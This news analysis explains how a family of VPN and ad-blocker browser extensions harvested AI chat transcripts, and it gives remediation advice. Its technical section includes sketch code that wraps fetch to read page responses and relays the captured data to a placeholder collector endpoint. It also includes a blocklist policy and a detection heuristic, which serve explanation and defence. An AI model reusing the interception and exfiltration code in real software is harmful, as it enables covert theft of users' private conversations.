A widely trusted class of browser add-ons—free VPNs, ad blockers and “browser guard” tools—has quietly been turned into a mass data‑collection pipeline, capturing full AI chat transcripts from millions of users and funneling the results to analytics backends operated by the extension publisher and its affiliate, according to independent research and multiple news reports.
Background
Security researchers at Koi Security discovered that a family of extensions published by the same organization injected platform‑specific JavaScript into web pages belonging to major web‑based AI assistants. Those injected “executor” scripts intercept every prompt and every AI response by wrapping the page’s network APIs (notably fetch and XMLHttpRequest), then forward the parsed conversation content to the extension’s background service worker for exfiltration. The technique works inside the page, where the content is already available in plaintext, so TLS does not prevent the capture.

Koi’s public write‑up identifies the flagship offender as Urban VPN Proxy and three sibling extensions—1ClickVPN Proxy, Urban Browser Guard and Urban Ad Blocker—available on both the Chrome Web Store and Microsoft Edge Add‑ons. Combined install counts reported by researchers and corroborated by multiple news outlets exceed eight million users across Chrome and Edge, with Urban VPN Proxy alone accounting for roughly six million Chrome installs and more than a million Edge installs.

This is not just a narrow metadata leak. The harvested package reportedly includes (an illustrative record is sketched after this list):
- every prompt a user typed;
- every reply the AI returned;
- conversation identifiers and timestamps;
- session metadata and model/platform identifiers;
- and, in some cases, contextual browsing state that can aid re‑identification.
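Concretely, one captured exchange could be represented as a single structured record. The sketch below is purely illustrative; the field names are assumptions for exposition, not values recovered from the extensions or named in Koi's analysis.

```js
// Purely illustrative shape of one harvested record. Field names are
// assumptions for exposition, not values recovered from the extensions.
const harvestedRecord = {
  platform: "chatgpt",                      // which per-platform executor fired
  conversationId: "abc123",                 // conversation identifier
  timestamp: Date.now(),                    // capture time
  prompt: "user's full input text",         // every prompt the user typed
  response: "assistant's full reply text",  // every reply the AI returned
  session: { model: "model-id", page: "https://example.invalid/chat" },
};
```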
How the harvesting works: a technical breakdown
Executor scripts and per‑platform targeting
Instead of relying on a single generic scraper, the extensions deploy a distinct executor script for each targeted AI service (for example, chatgpt.js, gemini.js, claude.js). These per‑platform scripts detect when a user navigates to a supported assistant and inject code into the page context to extract conversational content in its cleanest available form. The design is deliberately targeted: it adapts to the DOM and network behaviour of each AI front end.
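In practice, that routing can be as simple as a hostname lookup in the extension's background logic. The following is a minimal sketch of the pattern, assuming hypothetical file paths modelled on the names Koi reported; it is not recovered extension code.

```js
// Minimal sketch of per-platform executor dispatch (Manifest V3 style).
// File paths and structure are assumptions, not recovered extension code.
// Assumes the extension holds "scripting" plus broad host permissions.
const EXECUTORS = {
  "chatgpt.com": "executors/chatgpt.js",
  "gemini.google.com": "executors/gemini.js",
  "claude.ai": "executors/claude.js",
};

chrome.tabs.onUpdated.addListener((tabId, changeInfo, tab) => {
  if (changeInfo.status !== "complete" || !tab.url) return;
  const script = EXECUTORS[new URL(tab.url).hostname];
  if (script) {
    // world: "MAIN" injects into the page context itself, where the script
    // can wrap the page's own fetch and XMLHttpRequest.
    chrome.scripting.executeScript({
      target: { tabId },
      files: [script],
      world: "MAIN",
    });
  }
});
```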
Overriding fetch and XMLHttpRequest
The injected code wraps native browser networking APIs—chiefly fetch and XMLHttpRequest—so that requests and responses pass through the extension’s logic before (or as) the page renders them. This is an aggressive and reliable interception method: because the code runs inside the page, it sees content after the browser has decrypted it and before the user sees it, effectively bypassing TLS protections for content exposed in the page context.
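The general wrapping pattern is well known and easy to sketch. The snippet below illustrates the technique in its simplest form (fetch only); it is a schematic of the approach Koi describes, not the extensions' actual code:

```js
// Schematic of the fetch-wrapping technique: every response body becomes
// readable by injected code before the page consumes it. Illustration only.
const nativeFetch = window.fetch;

window.fetch = async function (...args) {
  const response = await nativeFetch.apply(this, args);
  // clone() reads the body without consuming the stream the page will read.
  response
    .clone()
    .text()
    .then((body) => {
      // A harvester would parse prompts and replies out of `body` here,
      // then hand the result off for exfiltration (see the next step).
      console.debug("intercepted", String(args[0]), body.length, "bytes");
    })
    .catch(() => {}); // ignore bodies that cannot be read as text
  return response;
};
```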
Packaging and exfiltration
Captured data is packaged and sent from the page to the extension’s content script via window.postMessage with a distinct message tag, then relayed to the background service worker for network exfiltration. Koi’s analysis traces the outgoing traffic to analytics endpoints under the publisher’s control—reported examples include analytics.urban-vpn.com and stats.urban-vpn.com—where the data is compressed and stored for downstream use.
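That three-hop relay (page script to content script to service worker) is a standard extension pattern. The sketch below shows its general shape; the message tag, message types and endpoint are placeholders, not the real values from Koi's write-up:

```js
// Illustrative three-hop relay. The tag, message types and endpoint are
// placeholders; the real extension's values and payload format differ.

// (1) Injected page-context script: tag the captured record and post it.
const capturedRecord = { prompt: "...", response: "..." }; // from the wrapper
window.postMessage({ tag: "__chat_capture__", payload: capturedRecord }, "*");

// (2) Content script: accept only same-window messages carrying the tag,
//     then relay them into the extension.
window.addEventListener("message", (event) => {
  if (event.source === window && event.data?.tag === "__chat_capture__") {
    chrome.runtime.sendMessage({ type: "exfil", payload: event.data.payload });
  }
});

// (3) Background service worker: ship the payload to a remote endpoint.
chrome.runtime.onMessage.addListener((msg) => {
  if (msg.type === "exfil") {
    fetch("https://collector.example.invalid/ingest", {
      method: "POST",
      headers: { "Content-Type": "application/json" },
      body: JSON.stringify(msg.payload),
    });
  }
});
```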
Default‑on, hidden by updates
Critically, the behaviour arrived via an automatic update (researchers identify version 5.5.0, released in July 2025) and was enabled by default. Because Chrome and Edge auto‑update extensions by default, millions of users received the new code without explicit re‑consent, and the harvesting ran without an obvious runtime toggle to stop it. The only guaranteed user control, researchers say, is to disable or uninstall the extension.
Which AI services were targeted
Koi’s report and subsequent coverage name major commercial assistants as targets, including:
- OpenAI ChatGPT,
- Anthropic Claude,
- Google Gemini,
- Microsoft Copilot,
- Perplexity,
- DeepSeek,
- Grok (xAI),
- Meta AI,
- and other web‑based assistants where the page structure allowed the executor to hook into responses.
That broad coverage makes the dataset richly sensitive: users routinely feed personal health questions, financial details, proprietary code, business strategy and other secrets into these assistants.
The market and the disclosure problem
Urban VPN’s promotional materials and UI present an “AI protection” feature that frames the monitoring as a security‑oriented safeguard. The company’s privacy policy, however, buried in legal text, explicitly references collection of “AI inputs and outputs” and permits disclosure of that data for marketing‑analytics purposes to an affiliated analytics firm identified as BiScience (also styled BIScience or B.I. Science in public documents). These conflicting signals, protective UI language versus a legal policy that allows commercial sharing, are central to why researchers call the practice deceptive.

At the same time, direct proof that harvested chat logs were sold to specific third‑party buyers (purchase receipts, downstream customer lists, or named contracts) is not publicly documented in forensic detail. The policy’s explicit permission to share with an affiliate and advertising/intelligence partners is a material red flag, but tracing data monetisation inside opaque ad‑tech markets is non‑trivial, and public evidence of identified buyers remains indirect. Researchers and reporters therefore treat downstream sales as highly likely and consistent with prior behaviour in the extension/data‑broker ecosystem, while flagging the absence of named buyer receipts as a caveat.

Why platform badges and review failed users
Several of the implicated extensions carried the Chrome Web Store “Featured” badge, an indicator Google says signals a manual review and a high standard of user experience. That fact has been emphasized repeatedly because a Featured badge functions as a de facto trust signal for consumers. Koi and multiple reporters note the paradox: human reviewers apparently cleared or overlooked code that deployed per‑platform executors to harvest data from services including Google’s own Gemini. Google’s Limited Use policy explicitly forbids transferring or selling user data to third‑party data brokers and restricts collection of browsing activity to narrowly disclosed, single‑purpose features.

The marketplaces’ review processes, especially where they rely primarily on static checks and listing disclosures, appear ill‑equipped to detect runtime behaviours that execute only when a user visits specific AI assistant pages. That gap is what allowed the data‑harvesting behaviour to slip into high‑install extensions. Security researchers have argued this is a structural marketplace failure: static listing checks and a checkbox‑driven privacy‑policy audit cannot see concealed runtime hooks. The result is that badges and featured placements can be misleading when runtime analysis is absent or insufficient.

Corroboration and independent reporting
Koi’s technical analysis was picked up quickly by major outlets—including The Register, Ars Technica, TechRadar, and a range of security‑focused sites—which reproduced Koi’s core findings and confirmed details such as the affected extension family, the per‑platform executor architecture, the exfiltration endpoints named in the write‑up, the July 2025 version change, and the rough install counts. Multiple independent researchers have previously documented related data‑broker activity by the affiliate BiScience, lending historical context to the allegation that this family’s clickstream‑collection operations extended into AI chat capture. Those cross‑checks increase confidence in the core claims.

At the same time, public evidence about the downstream purchasers of any captured chats remains indirect; tracing sales inside ad‑tech and data‑brokerage markets requires forensic documents or buyer confirmations that have not (yet) been published. Responsible reporting therefore treats the most damning technical claims (capture and exfiltration of chats) as verified, while treating specific allegations about buyers as plausible but not exhaustively proven.

Legal, privacy and regulatory implications
- Platform policy violations: If the extension actually transferred AI chat logs to a data‑broker affiliate for marketing analytics, that behaviour would appear to violate Chrome Web Store’s Limited Use restrictions and likely similar Microsoft Edge developer policies. Platforms may be obliged to enforce removals, developer account actions or other penalties.
- Consumer protection and privacy law: Depending on where the affected users live and what the chats contained, regulators could view mass harvesting of conversational content as unfair, deceptive or unlawfully intrusive. Personal data in AI chats—health, financial, identity identifiers—can trigger obligations under GDPR, CCPA and other regimes.
- Enterprise risk and compliance: Corporate users who allowed these extensions on work profiles may have leaked confidential business information or secrets into an unvetted consumer pipeline, creating exposure for trade secrets, contract obligations and regulated data. Enterprises must treat the incident as a credible data leakage vector.
Practical remediation and defensive steps
Immediate steps for individual users
- Uninstall any of the named extensions: Urban VPN Proxy, 1ClickVPN Proxy, Urban Browser Guard, Urban Ad Blocker. Manual removal is the only sure way to stop an installed malicious extension from running.
- Assume chats are compromised: Treat any AI conversations conducted since July 2025 (and particularly after the indicated July 9, 2025 update) as potentially exposed if the extension was installed. Rotate passwords, revoke tokens, and reissue any credentials or API keys pasted into those chats.
- Clear sync storage and sign out of browser sync if you suspect leaked data could propagate through synced storage or identifiers across devices. Enable multi‑factor authentication where possible.
For enterprise IT teams
- Enforce extension allowlists and blocklists centrally through Chrome Enterprise/Intune/GPO and Edge administrative controls: add the offending extension IDs to blocklists and prevent re‑installation. Use the store extension IDs identified by researchers to block installs quickly (a policy sketch follows this list).
- Conduct a scoped incident response: identify users that had the extensions installed and cross‑reference their AI usage to scope likely exfiltration. Rotate any company secrets that might have been disclosed in those sessions.
- Update procurement and policy: prohibit unmanaged browser extensions on profiles used for sensitive work; require a vetted, enterprise‑managed extension catalog for employees.
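As a concrete illustration, Chromium‑based browsers honour a managed ExtensionInstallBlocklist policy; on Linux, for example, it can be deployed as a JSON file in the browser's managed‑policies directory, while Windows fleets typically set the same policy via GPO, Intune or the registry. The IDs below are placeholders; substitute the real extension IDs published by researchers.

```json
{
  "ExtensionInstallBlocklist": [
    "placeholder-extension-id-0000000001",
    "placeholder-extension-id-0000000002"
  ]
}
```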
Recommendations for platform owners
- Platforms should run dynamic, runtime tests that exercise extensions against popular web services (including AI assistants), not just static manifest checks (a simple tamper‑detection heuristic is sketched after this list).
- Require forced re‑consent or a sandboxed runtime approval when an extension’s behaviour materially changes (e.g., new data flows to remote endpoints).
- Consider a higher privilege gating model for extensions that request blanket “read and change data on all sites” access—similar to mobile runtime permission prompts that fire at the time of risky behavior.
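One cheap runtime signal such a vetting harness (or a cautious web page) can check is whether the page's networking primitives still look native; a page‑context wrapper usually breaks the native‑code string form. This is a heuristic sketch only, since a determined interceptor can spoof toString as well:

```js
// Heuristic: genuine native functions stringify to "...[native code]...".
// A page-context wrapper usually does not. Not foolproof: an attacker can
// also patch Function.prototype.toString, so treat this as one weak signal.
function looksNative(fn) {
  return (
    typeof fn === "function" &&
    Function.prototype.toString.call(fn).includes("[native code]")
  );
}

if (
  !looksNative(window.fetch) ||
  !looksNative(window.XMLHttpRequest.prototype.send)
) {
  console.warn("fetch/XHR appear to be wrapped by injected code");
}
```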
Strengths, limits and unanswered questions
What is well supported
- The technical mechanism—per‑platform executor scripts that hook fetch/XHR and exfiltrate conversation text—is described in detailed analysis and reproduced in multiple independent write‑ups and news reports.
- The timeline (behaviour introduced via version 5.5.0 in July 2025 and distributed by automatic updates) and the broad install counts are consistent across the primary technical disclosure and independent reporting.
What remains uncertain
- Public evidence that specific third‑party buyers purchased particular conversation logs is indirect: the publisher’s privacy policy names sharing with an affiliate ad/analytics firm (BiScience), which strongly suggests commercialisation, but public, named buyer receipts are not part of the disclosed corpus. Treat claims of particular downstream sales as plausible and highly suspicious, while noting the lack of forensic purchaser evidence in the public record.
Unanswered questions
- Has the publisher retained conversation logs indefinitely or applied deletion/retention rules?
- Which specific downstream partners (if any) ingested datasets drawn from these conversations?
- What enforcement action will platform owners take (takedown, developer account suspension, audits)?
- If the extension remains on any stores or in caches, what steps will Google and Microsoft take to prevent re‑publication under a different package?
Big picture: why this matters beyond one extension family
This incident highlights a systemic problem: the browser‑extension model grants powerful runtime privileges and seamless update mechanisms that can be abused to change an app’s behaviour at scale without users noticing. When those privileges intersect with AI assistants—tools people use for deeply personal and business‑critical conversations—the potential harms shift from ad annoyance to serious leakage of sensitive secrets.

Marketplaces and enterprise security policies were originally designed around ad injection, UI hijacking and privacy‑policy checkboxes. The emergence of AI as a daily confidential workspace requires stronger runtime checks, stricter enforcement of Limited Use rules, and an updated threat model for browser‑based agentic tools. Otherwise, “privacy” add‑ons will continue to be a vector for monetising the most intimate forms of user data.
Conclusion
The Koi Security findings and rapid corroboration by independent outlets reveal a troubling reality: browser extensions marketed for privacy can be engineered to betray that trust at scale, harvesting full AI conversations and routing them to analytics backends linked to an affiliate data broker. The technical details—per‑platform executor scripts, fetch/XHR interception, automatic updates and default‑on harvesting—are clear and repeatable, and the install counts make the incident consequential.

Platform owners, regulators and enterprise IT teams now face an urgent choice: close the inspection gap that allowed this behaviour to pass review, harden extension‑policy enforcement and operationalise runtime vetting, or accept that the same distribution channels that make extensions useful will continue to be exploited to monetise highly sensitive user conversations. In the short term, the practical defence is simple and blunt: audit, uninstall, revoke and block. The longer‑term fix requires structural changes to how extensions are reviewed, how consent is obtained, and how runtime behaviour is validated.
Source: theregister.com, “Chrome, Edge privacy extensions quietly snarf AI chats”